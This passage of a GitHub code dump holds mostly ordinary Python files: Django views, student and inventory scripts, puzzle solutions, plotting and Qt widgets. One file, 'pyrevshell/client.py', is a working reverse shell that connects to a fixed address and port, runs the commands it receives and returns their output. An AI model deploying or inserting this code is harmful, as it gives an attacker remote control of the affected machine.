item[\"kitItem\"][\"pd_id\"],\n \"od_quantity\": item[\"count\"],\n \"od_price\": item[\"count\"] * item[\"kitItem\"][\"pd_price\"]\n }\n detail_serializer = Order_detailSerializer(data=od_detail_data)\n if detail_serializer.is_valid():\n detail_serializer.save()\n else:\n return Response({'message' : \"Error product id: \" + str(item[\"kitItem\"][\"pd_id\"])})\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n elif order_condition == 'sub':\n \n for sub in request.data[\"items\"]:\n \n od_sub_data = {\n \"order_id\": current_order_id,\n \"subpd_id\": sub[\"id\"],\n \"user_id\": id\n }\n subSerializer = SubSerializer(data=od_sub_data)\n \n if subSerializer.is_valid():\n subSerializer.save()\n else:\n return Response({'message' : \"Error subpd_id: \" + str(sub[\"id\"])})\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response({'message' : \"no valid order\"})\n \n else:\n return Response({'message' : \"no auth token\"})\n\n\n \n","repo_name":"wodnrP/HobbyDiscovery","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43763606275","text":"from rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom batchuploadimages.serializers import ImageSerializer\n\n\n\n\ndef ImageLookup(pk):\n return {'imagefilename': 'imagefilename.jpg', 'image': 'imagedata'}\n\n\n# @api_view(['GET', 'POST'])\n#@api_view(['POST'])\n@csrf_exempt\ndef image_list(request):\n\n if request.method == 'POST':\n return Response({\"message\": \"Got some data!\", \"data\": request.data})\n return Response({\"message\": \"Hello, world!\"})\n \"\"\"\n List all image, or create a new one\n \"\"\"\n\n # GET Request\n #if request.method == 'GET':\n # images = ImageLookup()\n # serializer = ImageSerializer(images)\n # return Response(serializer.data)\n\n # POST Request\n if request.method == 'POST':\n serializer = ImageSerializer(data=request.DATA)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n else:\n return Response(\n serializer.errors, status=status.HTTP_400_BAD_REQUEST\n )\n\n\n#@api_view(['GET', 'PUT', 'DELETE'])\n@csrf_exempt\ndef image_detail(request, pk):\n \"\"\"\n Get, update, or delete a specific image\n \"\"\"\n try:\n image = ImageLookup(pk=pk)\n except:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n # GET request\n if request.method == 'GET':\n serializer = ImageSerializer(image)\n return Response(serializer.data)\n\n # PUT request\n if request.method == 'PUT':\n serializer = ImageSerializer(image, data=request.DATA)\n\n if serializer.is_valid():\n serializer.save()\n return Response(status=status.HTTP_201_CREATED)\n\n else:\n return Response(\n serializer.errors, status=status.HTTP_400_BAD_REQUEST\n )\n\n # DELETE request\n elif request.method == 'DELETE':\n image.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)","repo_name":"RjLi13/bampfa_project","sub_path":"batchuploadimages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39100066128","text":"from domain import * \nimport math\nimport os \n\nclass Input(Student,Course,Mark):\n list_course_name = []\n list_student_name = []\n list_credits = []\n def __init__(self,sid = str(),name = str(),dob = str(),cid = str(),c_name = str(), credits = int(),mark = None):\n Student.__init__(self,sid,name,dob)\n Course.__init__(self,cid,c_name,credits)\n Mark.__init__(self,mark)\n \n def set_sid(self):\n self.sid = input(\"Please enter your student id:\")\n return self.sid\n \n def set_name(self):\n self.name = input(\"Please enter your student name:\")\n Input.list_student_name.append(self.name)\n return self.name\n \n def set_dob(self):\n self.dob = input(\"Please enter your date of birth:\")\n return self.dob\n \n def add_student(self):\n self.num_student = int(input(\"Enter number of students :\"))\n for i in range(self.num_student):\n sid = self.set_sid()\n name = self.set_name()\n dob = self.set_dob()\n self.stu_list.append((sid,name,dob))\n with open(\"students.txt\",\"a\") as file:\n file.write(f\"student id : {sid},name : {name},date of birth: {dob}\\n\")\n \n def set_cid(self):\n self.cid = input(\"Please enter your course Id:\")\n return self.cid\n \n def set_course_name(self):\n self.c_name = input(\"Enter course name:\")\n Input.list_course_name.append(self.c_name)\n return self.c_name\n \n def set_credits(self):\n self.credits = int(input(\"Enter credits for this course:\"))\n Input.list_credits.append(self.credits) \n return self.credits\n \n def add_course(self):\n self.num_c = int(input(\"Enter number of courses: \"))\n for i in range(self.num_c):\n cid = self.set_cid()\n course_name = self.set_course_name()\n credits = self.set_credits()\n self.course_list.append((cid,course_name,credits))\n with open(\"courses.txt\",\"a\") as file:\n file.write(f\"course id : {cid},course name : {course_name},numbers of credits : {credits}\\n\")\n \n def set_mark(self,stu_name,course_name):\n mark = float(input())\n mark = math.floor(mark*10)/10\n if mark > 25 or mark < 0 :\n print(\"Error mark input ! too high or too small\")\n return 0 \n else:\n self.mark_dict[(stu_name,course_name)] = mark\n with open(\"marks.txt\",\"a\") as f:\n f.write(f\"in the {course_name}, {stu_name} : {mark}\\n\")\n \n def add_marks(self):\n self.course_name = input(\"Enter the course name that you want to add marks:\")\n if self.course_name not in Input.list_course_name:\n print(\"The course id not exist !\")\n return 0\n else:\n print(f\"for the course {self.course_name} :\")\n for self.stu_name in Input.list_student_name:\n print(f\"Enter the mark for {self.stu_name}:\",end = \" \")\n self.set_mark(self.stu_name,self.course_name)\n print(\"------------------------------------\") \n \nclass Save:\n def compress():\n with open(\"students.dat\",\"a\") as outfile:\n with open(\"students.txt\",\"r\") as infile:\n outfile.write(infile.read())\n outfile.write(\"\\nEnd\\n\")\n with open(\"courses.txt\",\"r\") as infile:\n outfile.write(infile.read())\n outfile.write(\"\\nEnd\\n\")\n with open(\"marks.txt\",\"r\") as infile:\n outfile.write(infile.read())\n outfile.write(\"\\nEnd\\n\")\n os.remove(\"students.txt\")\n os.remove(\"courses.txt\")\n os.remove(\"marks.txt\")\n \nclass Open:\n def decompress():\n print(\"------------------------------------\")\n if os.path.exists(\"students.dat\"):\n with open(\"students.dat\",\"r\") as f:\n print(f.read())\n else:\n print(\"file not found !\")\n\n os.remove(\"student.dat\")","repo_name":"vdh1612/pp2023","sub_path":"pw5/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"26464660000","text":"s =\"leEeetcode\"\nl=[]\nl.append(s[0])\n\nfor i in s[1:len(s)]:\n try:\n if l[-1].islower() and i==l[-1].upper(): \n l.pop()\n elif l[-1].isupper() and i==l[-1].lower(): \n l.pop()\n else:\n l.append(i)\n except IndexError:\n l.append(i)\n\nprint(''.join(l))\n","repo_name":"Kshitij269/Questions","sub_path":"Stacks Remove Upper or Lower.py","file_name":"Stacks Remove Upper or Lower.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13693320096","text":"import os\nimport socket\nimport subprocess\nimport sys\n\ndef receiver(s):\n while True:\n cmd_bytes = s.recv(4096)\n cmd = cmd_bytes.decode(\"utf-8\")\n if cmd.startswith(\"cd \"):\n os.chdir(cmd[3:])\n s.send(b\"$: \")\n continue\n if len(cmd) > 0:\n p = subprocess.run(cmd, shell=True, capture_output=True)\n data = p.stdout + p.stderr\n s.sendall(data + b\"$: \")\n\ndef connect(address):\n try:\n s = socket.socket()\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.connect(address)\n except socket.error:\n sys.exit()\n receiver(s)\n\nif __name__ == \"__main__\":\n host = \"192.168.1.3\"\n port = 19876\n connect((host, port))\n","repo_name":"CxllZ/pyrevshell","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7450058748","text":"import math\nfrom collections import deque, defaultdict\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\n\n\ndef find_parent(parent, a):\n if parent[a] != a:\n parent[a] = find_parent(parent, parent[a])\n return parent[a]\n\n\ndef union_parent(parent, a, b):\n a = find_parent(parent, a)\n b = find_parent(parent, b)\n if a > b:\n parent[a] = b\n elif a < b:\n parent[b] = a\n\n\ndef solution(land, height):\n size = len(land)\n history = [[0 for _ in range(size)] for _ in range(size)] # 그룹 번호 저장\n ladder = defaultdict(lambda: math.inf) # 그룹간의 최소비용 저장\n gr_num = 0\n for a in range(size):\n for b in range(size):\n if history[a][b] != 0:\n continue\n elif history[a][b] == 0:\n gr_num += 1\n queue = deque()\n queue.append((a, b))\n while queue:\n x, y = queue.popleft()\n target = land[x][y]\n if not (0 <= x <= size - 1 and 0 <= y <= size - 1):\n continue\n if history[x][y] != 0:\n continue\n history[x][y] = gr_num\n for dx, dy in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n nx, ny = x + dx, y + dy\n if 0 <= nx <= size - 1 and 0 <= ny <= size - 1:\n next_target = land[nx][ny]\n gap = abs(next_target - target)\n ngr_num = history[nx][ny]\n if ngr_num != 0 and ngr_num != gr_num:\n ladder[tuple(sorted((gr_num, ngr_num)))] = min(\n ladder[tuple(sorted((gr_num, ngr_num)))], gap\n )\n elif gap <= height:\n queue.append((nx, ny))\n\n answer = 0\n ladder = sorted(ladder.items(), key=lambda x: x[1])\n parent = {i: i for i in range(1, gr_num + 1)}\n for (x, y), cost in ladder:\n if find_parent(parent, x) != find_parent(parent, y):\n union_parent(parent, x, y)\n answer += cost\n if len(parent.values()) == 1:\n break\n\n return answer\n\n\nprint(\n solution([[1, 4, 8, 10], [5, 5, 5, 5], [10, 10, 10, 10], [10, 10, 10, 20]], 3)\n) # 15\nprint(\n solution([[10, 11, 10, 11], [2, 21, 20, 10], [1, 20, 21, 11], [2, 1, 2, 1]], 1)\n) # 18\nprint(solution([[0, 1, 2, 3], [7, 6, 5, 4], [8, 9, 10, 11], [15, 14, 13, 12]], 1)) # 0\nprint(\n solution(\n [\n [1, 1, 5, 5],\n [10, 10, 50, 50],\n [100, 100, 500, 500],\n [1000, 1000, 5000, 5000],\n ],\n 1,\n )\n) # 5443\n\nprint(\n solution(\n [\n [10, 10, 10, 10],\n [1, 30, 5, 10],\n [1, 20, 6, 10],\n [1, 1, 1, 1],\n ],\n 3,\n )\n) # 4\n","repo_name":"lgj9172/algorithm","sub_path":"programers/지형 이동.py","file_name":"지형 이동.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33639355369","text":"def solution(str1, str2):\n str1 = str1.upper() + \".\"\n str2 = str2.upper() + \".\"\n l1 = []\n l2 = []\n d1 = {}\n d2 = {}\n\n for i in range(len(str1) - 1):\n if ('A' <= str1[i] <= 'Z') and ('A' <= str1[i + 1] <= 'Z'):\n tmp = str1[i] + str1[i + 1]\n l1.append(tmp)\n for i in range(len(str2) - 1):\n if ('A' <= str2[i] <= 'Z') and ('A' <= str2[i + 1] <= 'Z'):\n tmp = str2[i] + str2[i + 1]\n l2.append(tmp)\n\n for i in range(len(l1)):\n if l1[i] in d1:\n d1[l1[i]] += 1\n else:\n d1[l1[i]] = 1\n for i in range(len(l2)):\n if l2[i] in d2:\n d2[l2[i]] += 1\n else:\n d2[l2[i]] = 1\n l1 = list(set(l1))\n l2 = list(set(l2))\n s = 0 # sum\n a = 0 # and\n for i in range(len(l1)):\n if l1[i] in d1 and l1[i] in d2:\n a += min(d2[l1[i]], d1[l1[i]])\n s += max(d2[l1[i]], d1[l1[i]])\n del d1[l1[i]]\n del d2[l1[i]]\n elif l1[i] in d1 and l1[i] not in d2:\n s += d1[l1[i]]\n del d1[l1[i]]\n for i in range(len(l2)):\n if l2[i] in d2 and l2[i] in d1:\n a += min(d2[l2[i]], d1[l2[i]])\n s += max(d2[l2[i]], d1[l2[i]])\n del d1[l2[i]]\n del d2[l2[i]]\n elif l2[i] in d2 and l2[i] not in d1:\n s += d2[l2[i]]\n del d2[l2[i]]\n if s == 0:\n return 65536\n else:\n answer = int((a / s) * 65536)\n return answer\n\n","repo_name":"tfer2442/myAlgorithm","sub_path":"프로그래머스/lv2/17677. [1차] 뉴스 클러스터링/[1차] 뉴스 클러스터링.py","file_name":"[1차] 뉴스 클러스터링.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37261776618","text":"# Code for visualizing voxels and point clouds.\n\nfrom matplotlib import pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport pdb\n\ndef plot_3d_points(points, bound=0.5, signed_distances=None):\n fig = pyplot.figure()\n \n ax = fig.add_subplot(111, projection='3d')\n\n if len(points) != 0 and signed_distances is not None:\n ax.scatter(xs=points[:, 0], ys=points[:, 1], zs=points[:, 2], c=signed_distances)\n else:\n ax.scatter(xs=points[:, 0], ys=points[:, 1], zs=points[:, 2])\n\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n ax.set_zlabel('Z')\n ax.set_title('SDF')\n\n ax.set_xlim3d(-bound, bound)\n ax.set_ylim3d(-bound, bound)\n ax.set_zlim3d(-bound, bound)\n\n pyplot.show()\n\ndef visualize_points_overlay(point_sets, bound=0.5, show=False):\n num_sets = len(point_sets)\n colors = ['red', 'blue', 'yellow', 'orange', 'green']\n assert(num_sets <= len(colors))\n\n fig = pyplot.figure()\n ax = fig.add_subplot(111, projection='3d')\n for i, s in enumerate(range(num_sets)):\n ax.scatter(point_sets[i][:, 0], point_sets[i][:, 1], point_sets[i][:, 2], c=colors[i])\n\n ax.set_xlim3d(-bound, bound)\n ax.set_ylim3d(-bound, bound)\n ax.set_zlim3d(-bound, bound)\n\n pyplot.show()\n\ndef plot_voxel(voxel, img_path=None, voxel_res=(32,32,32)):\n fig = pyplot.figure()\n \n ax = fig.add_subplot(111, projection='3d')\n\n if len(voxel) != 0:\n ax.scatter(voxel[:, 0], voxel[:, 1], voxel[:, 2])\n\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n ax.set_zlabel('Z')\n ax.set_title('voxel')\n\n if voxel_res is not None:\n ax.set_xlim3d(0, voxel_res[0])\n ax.set_ylim3d(0, voxel_res[1])\n ax.set_zlim3d(0, voxel_res[2])\n \n pyplot.show()\n if img_path is not None:\n pyplot.savefig(img_path)\n\ndef convert_to_sparse_voxel_grid(voxel_grid, threshold=0.5):\n sparse_voxel_grid = []\n voxel_dim = voxel_grid.shape\n for i in xrange(voxel_dim[0]):\n for j in xrange(voxel_dim[1]):\n for k in xrange(voxel_dim[2]):\n if voxel_grid[i, j, k] > threshold:\n sparse_voxel_grid.append([i, j, k])\n return np.asarray(sparse_voxel_grid)\n","repo_name":"mvandermerwe/PointSDF","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"61"} +{"seq_id":"38506574116","text":"from ceramatch.view.vcontrols_groups.controls.button import (Button)\n\nfrom PySide2 import (QtWidgets, QtCore, QtGui)\nfrom deposit.utils.fnc_files import (as_url, url_to_path)\n\nclass AttributeControl(object):\n\t\n\tsignal_changed = QtCore.Signal(str, str) # (name, value)\n\t\n\tdef __init__(self, name):\n\t\t\n\t\tself.name = name\n\t\n\tdef get_value(self):\n\t\t\n\t\treturn \"\"\n\t\n\tdef set_value(self, value):\n\t\t\n\t\tpass\n\t\n\tdef set_items(self, values):\n\t\t\n\t\tpass\n\t\n\t@QtCore.Slot()\n\tdef on_changed(self, *args):\n\t\t\n\t\tself.signal_changed.emit(self.name, self.get_value())\n\nclass LineEdit(AttributeControl, QtWidgets.QLineEdit):\n\t\n\tdef __init__(self, name):\n\t\t\n\t\tAttributeControl.__init__(self, name)\n\t\tQtWidgets.QLineEdit.__init__(self)\n\t\t\n\t\tself.textChanged.connect(self.on_changed)\n\t\n\tdef get_value(self):\n\t\t\n\t\treturn self.text().strip()\n\t\n\tdef set_value(self, value):\n\t\t\n\t\tself.blockSignals(True)\n\t\tself.setText(value)\n\t\tself.blockSignals(False)\n\nclass ComboBox(AttributeControl, QtWidgets.QComboBox):\n\t\n\tdef __init__(self, name):\n\t\t\n\t\tAttributeControl.__init__(self, name)\n\t\tQtWidgets.QComboBox.__init__(self)\n\t\t\n\t\tself.setEditable(True)\n\t\t\n\t\tself.currentTextChanged.connect(self.on_changed)\n\t\n\tdef get_value(self):\n\t\t\n\t\treturn self.currentText().strip()\n\t\n\tdef set_value(self, value):\n\t\t\n\t\tself.blockSignals(True)\n\t\tself.setCurrentText(value)\n\t\tself.blockSignals(False)\n\t\n\tdef set_items(self, values):\n\t\t\n\t\tself.blockSignals(True)\n\t\tcurrent_value = self.currentText()\n\t\tself.clear()\n\t\tif values:\n\t\t\tself.addItems(values)\n\t\tif current_value in values:\n\t\t\tself.setCurrentIndex(values.index(current_value))\n\t\telif current_value:\n\t\t\tself.setCurrentText(current_value)\n\t\tself.blockSignals(False)\n\nclass CheckBox(AttributeControl, QtWidgets.QCheckBox):\n\t\n\tdef __init__(self, name):\n\t\t\n\t\t\n\t\tAttributeControl.__init__(self, name)\n\t\tQtWidgets.QCheckBox.__init__(self)\n\t\t\n\t\tself.stateChanged.connect(self.on_changed)\n\t\n\tdef get_value(self):\n\t\t\n\t\treturn str(int(self.isChecked()))\n\t\n\tdef set_value(self, value):\n\t\t\n\t\tvalue_ = False\n\t\ttry:\n\t\t\tvalue_ = bool(int(value))\n\t\texcept:\n\t\t\traise Exception(\n\t\t\t\t\"Error: Could not convert attribute %s, value '%s' to bool\" % (self.name, str(value))\n\t\t\t)\n\t\tself.blockSignals(True)\n\t\tself.setChecked(value_)\n\t\tself.blockSignals(False)\n\t\n\tdef set_items(self, values):\n\t\t\n\t\tpass\n\nCONTROL_CLASSES = {\n\t\"LineEdit\": LineEdit,\n\t\"ComboBox\": ComboBox,\n\t\"CheckBox\": CheckBox,\n}\n\nclass Attributes(QtWidgets.QGroupBox):\n\t\n\tsignal_store_attributes = QtCore.Signal()\n\t\n\tdef __init__(self):\n\t\t\n\t\tQtWidgets.QGroupBox.__init__(self, \"Attributes\")\n\t\t\n\t\tself._attributes = {} # {lap_name: control, ...}\n\t\tself._labels = {} # {lap_name: label, ...}\n\t\tself._attributes_changed = False\n\t\t\n\t\tself.setStyleSheet(\"QGroupBox {font-weight: bold;}\")\n\t\tself.setLayout(QtWidgets.QVBoxLayout())\n\t\t\n\t\tself._form_frame = QtWidgets.QFrame()\n\t\tself._form_frame.setLayout(QtWidgets.QFormLayout())\n\t\tself._form_frame.layout().setContentsMargins(5, 5, 5, 5)\n\t\t\n\t\tself.store_button = Button(\"Store\", self.on_store)\n\t\t\n\t\tlabel = QtWidgets.QLabel(\n\t\t\t\"To modify attributes, use the LAP application - 'Edit Descriptors' function.\"\n\t\t)\n\t\tlabel.setWordWrap(True)\n\t\t\n\t\tself.layout().addWidget(self._form_frame)\n\t\tself.layout().addWidget(self.store_button)\n\t\tself.layout().addWidget(label)\n\t\t\n\t\tself.update_store_button()\n\t\n\t\n\t# ---- Signal handling\n\t# ------------------------------------------------------------------------\n\t@QtCore.Slot(str, str)\n\tdef on_changed(self, name, value):\n\t\t\n\t\tself._attributes_changed = True\n\t\tself.update_store_button()\n\t\n\t@QtCore.Slot(str, str)\n\tdef on_store(self):\n\t\t\n\t\tself.signal_store_attributes.emit()\n\t\n\t# ---- get/set\n\t# ------------------------------------------------------------------------\n\tdef update_store_button(self):\n\t\t\n\t\tstate = False\n\t\tif self._attributes_changed and self.get_data():\n\t\t\tstate = True\n\t\tself.store_button.setEnabled(state)\n\t\n\tdef populate(self, rows):\n\t\t# rows = [(label, ctrl_type, name), ...]\n\t\t\n\t\tself._attributes_changed = False\n\t\tself._attributes = {}\n\t\tself._labels = {}\n\t\tlayout = self._form_frame.layout()\n\t\tfor row in reversed(range(layout.rowCount())):\n\t\t\tlayout.removeRow(row)\n\t\tfor label, ctrl_type, name in rows:\n\t\t\tif ctrl_type not in CONTROL_CLASSES:\n\t\t\t\tcontinue\n\t\t\tself._attributes[name] = CONTROL_CLASSES[ctrl_type](name)\n\t\t\tself._attributes[name].signal_changed.connect(self.on_changed)\n\t\t\tself._labels[name] = label\n\t\t\tlayout.addRow(QtWidgets.QLabel(\"%s:\" % label), self._attributes[name])\n\t\tself.update_store_button()\n\t\n\tdef clear(self):\n\t\t\n\t\tself.populate([])\n\t\tself.update_store_button()\n\t\n\tdef get_data(self):\n\t\t# return data = {name: value, ...}\n\t\t\n\t\tdata = {}\n\t\tfor name in self._attributes:\n\t\t\tvalue = self._attributes[name].get_value()\n\t\t\tif value:\n\t\t\t\tdata[name] = value\n\t\t\n\t\treturn data\n\t\n\tdef set_data(self, data):\n\t\t# data = {name: (value, items), ...}; items = [value, ...]\n\t\t\n\t\tself._attributes_changed = False\n\t\tfor name in self._attributes:\n\t\t\tvalue, items = data.get(name, (\"\", []))\n\t\t\tif value is None:\n\t\t\t\tvalue = \"\"\n\t\t\tself._attributes[name].set_items([str(value) for value in items])\n\t\t\tself._attributes[name].set_value(str(value))\n\t\tself.update_store_button()\n","repo_name":"demjanp/CeraMatch","sub_path":"src/ceramatch/view/vcontrols_groups/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"9483876350","text":"import sys\nn,m = map(int, sys.stdin.readline().split())\nduck = list(map(int, sys.stdin.readline().split()))\nduck = sorted(duck)\n\n# def binary_search(array, target, start, end):\n# mid = (start+end)//2\n#\n# summ = [(i - array[mid]) for i in array if (i-array[mid])>0]\n# num_sum = sum(summ)\n# if start >= end:\n# return None\n# elif num_sum == target:\n# return array[mid]\n#\n# elif num_sum < target:\n# return binary_search(array, target, start, mid - 1)\n# elif num_sum > target:\n# return binary_search(array,target,mid + 1, end)\n#\n# result = binary_search(duck,m,0,n-1)\n# print(result)\nstart = 0\nend = max(duck)\nresult = 0\nwhile (start <= end):\n mid = (start + end) // 2\n summ = [(i - mid) for i in duck if (i - mid) > 0]\n num_sum = sum(summ)\n\n if num_sum < m:\n end = mid - 1\n else:\n result = mid\n start = mid + 1\nprint(result)","repo_name":"lJINSUSl/DataStructure_Algorithm","sub_path":"백준모음/백준_알고리즘_이분탐색/나동빈_p201.py","file_name":"나동빈_p201.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71800428034","text":"import xlsxwriter\n\ncalismaKitabi = xlsxwriter.Workbook(\"COVID19 Türkiye Grafiği Açı.xlsx\")\nsayfaYapim = calismaKitabi.add_worksheet()\n\nboldDegeri = calismaKitabi.add_format({'bold': 1}) #Kalın Yazılacak Yazılara eklemek için style\n\nbasliklar = ['Durum', 'Sayılar']\n\nveriYapım = [\n ['Vefat Eden', 'Vaka', 'İyileşen'],\n [92,5698,42]\n]\n\nsayfaYapim.write_row('A1', basliklar, boldDegeri)\nsayfaYapim.write_column('A2', veriYapım[0])\nsayfaYapim.write_column('B2', veriYapım[1])\n\nchartYapim = calismaKitabi.add_chart({'type':'pie'})\n\nchartYapim.add_series({\n 'name':'Covid19 Grafiği',\n 'categories' : ['Sheet1',1,0,3,0],\n 'values' : ['Sheet1',1,1,3,1],\n 'points' : [\n {'fill' : {'color' : 'red'}},\n {'fill' : {'color' : 'purple'}},\n {'fill' : {'color' : 'yellow'}},\n ]\n})\nchartYapim.set_title({'name': 'COVİD19 TURKİYE GRAFİĞİ'})\nchartYapim.set_rotation(90)\nsayfaYapim.insert_chart('C2', chartYapim)\ncalismaKitabi.close()","repo_name":"erdiakpinar1/Python---Excel","sub_path":"13-TurkiyeCovidPie.py","file_name":"13-TurkiyeCovidPie.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39073973193","text":"import math\nimport numpy as np\n\n\ndef check_squares(tile, tile2):\n if np.array_equal(tile[-1], tile2[0]):\n return 1\n if np.array_equal(tile[0], tile2[-1]):\n return -1\n return 0\n\n \"\"\"print(tile)\n print()\n print(np.rot90(tile,1,(0,1))) #rotateleft\n print()\n print(np.flip(tile,0)) # Y Achse\n print()\n print(np.flip(tile, 1)) # X Achse\"\"\"\n\n\ndef task_1():\n with open(\"Input/20.txt\") as f:\n data = [x.split(\":\\n\") for x in f.read().split(\"\\n\\n\")]\n data = [[x.split(\"\\n\") for x in y] for y in data]\n for t in data:\n t[0] = int(t[0][0].split(\" \")[1])\n [[print(x) for x in y] for y in data]\n length = len(data) ** 0.5\n current_grid = np.zeros((int(length), int(length)))\n space = np.zeros((int(length), int(length), 10, 10))\n for i, d in enumerate(data):\n current_grid[int(math.floor(i / length)), int(i % length)] = d[0]\n for idx, x in enumerate(d[1]):\n for idy, y in enumerate(x):\n if y == \"#\":\n space[int(math.floor(i / length)), int(i % length), idx, idy] = 1\n check_squares(space, 0, 0, 1, 0)\n","repo_name":"Strawl/advent-of-code","sub_path":"2020/Calendar_2020/Day20.py","file_name":"Day20.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36477582500","text":"\n# class Student:\n# \"\"\"Developed by Nilesh in python class\"\"\"\n# def __init__(self,name, age,marks):\n# self.name=name\n# self.age=age\n# self.marks=marks\n#\n# def talk(self):\n# print(\"Hello myself\", self.name)\n# print(\"my age is\", self.age)\n# print(\"marks scored are\",self.marks)\n#\n# s1=Student(\"Nilesh\", 20, 99)\n# s1.talk()\n\n\nclass Student:\n def __init__(self,x,y,z):\n self.name=x\n self.rollno=y\n self.marks=z\n\n def display(self):\n print(\"Name:{}\\nRollNo:{}\\nMarks:{}\".format(self.name,self.rollno,self.marks))\n\ns1=Student(\"Nilesh\",20,99)\ns1.display()\n\ns2=Student(\"Mansi\",20,99)\ns2.display()","repo_name":"nileshsrivastava27/Python_program","sub_path":"class_1.py","file_name":"class_1.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6607615434","text":"class Solution(object):\n def originalDigits(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n nums = {'zero':'0', 'one':'1', 'two':'2', 'three':'3', 'four':'4', 'five':'5', 'six':'6', 'seven':'7',\n 'eight':'8', 'nine':'9'}\n flag1 = {'z': 'zero', 'w': 'two','x': 'six', 'u': 'four', 'g': 'eight'}\n flag2 = {'t': 'three', 'f': 'five', 'o': 'one', 's': 'seven'}\n flag3 = {'i': 'nine'}\n letter = {}\n res = ''\n\n for v in s:\n if v in letter:\n letter[v] += 1\n else:\n letter[v] = 1\n # print letter\n\n for flag in [flag1, flag2, flag3]:\n for k in flag.keys():\n if k in letter and letter[k]:\n res += nums[flag[k]]*letter[k]\n n = letter[k]\n for v in flag[k]:\n letter[v] -= n\n res = sorted(res)\n return ''.join(res)\n","repo_name":"qinqiang-huihui/leetcode_learning","sub_path":"423. Reconstruct Original Digits from English/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9076968057","text":"#to open the json doc\r\nfd = open(\"/content/dhanu1.json\",'r')\r\nr = fd.read()\r\nfd.close()\r\nimport json\r\ndhanu1 = json.loads(r)\r\n\r\n\r\n\r\n#to get new prod_id,name,pr,qn\r\nprod_id = str(input(\"Enter product id:\"))\r\nname = str(input(\"Enter name:\"))\r\npr = int(input(\"Enter price:\"))\r\nqn = int(input(\"Enter quantity:\"))\r\n\r\nmanu[prod_id] = {'name': name, 'pr': pr, 'qn': qn}\r\n\r\njs = json.dumps(dhanu1)\r\n\r\nfd = open(\"/content/dhanu1.json\",'w')\r\nfd.write(js)\r\nfd.close()\r\n\r\n\r\n\r\n#to open the updated doc\r\nimport json\r\n\r\nfd = open(\"/content/dhanu1.json\",'r')\r\nr = fd.read()\r\nfd.close()\r\n\r\nmanu = json.loads(r)\r\n\r\n\r\n\r\n#to get prod_id and quantity from to to buy\r\nd_prod = str(input(\"Enter the product_Id: \"))\r\nd_quant = int(input(\"Enter the quantity: \"))\r\nif dhanu1[d_prod]['qn']<=0:\r\n print(\"product is not available in store\")\r\nelif d_quant>dhanu1[d_prod]['qn']:\r\n print(\"That much quantity is not available\")\r\nelse:\r\n print(\"Product: \", dhanu1[d_prod]['name'])\r\n print(\"Price: \", dhanu1[d_prod]['pr'])\r\n print(\"Billing Amount: \", dhanu1[d_prod]['pr'] * d_quant)\r\n dhanu1[d_prod]['qn'] = dhanu1[d_prod]['qn'] - d_quant\r\n\r\n\r\n#to update the file as per sales\r\nimport json\r\n\r\nfd = open(\"/content/dhanu1.json\",'r')\r\nr = fd.read()\r\nfd.close()\r\n\r\ndhanu1 = json.loads(r)\r\n\r\n\r\n\r\n#to print the receipt\r\nrecepit={'prod' : d_prod, 'qn' : d_quant, 'amount': dhanu1[d_prod]['pr'] * d_quant}\r\nreceipt\r\n\r\n\r\n","repo_name":"Dhanushguptha19/ETG-project1-json-","sub_path":"IMS_code.py","file_name":"IMS_code.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13403846570","text":"import inspect\nimport re\n\nfrom fastapi import FastAPI\nfrom fastapi.openapi.utils import get_openapi\nfrom fastapi.routing import APIRoute\nfrom 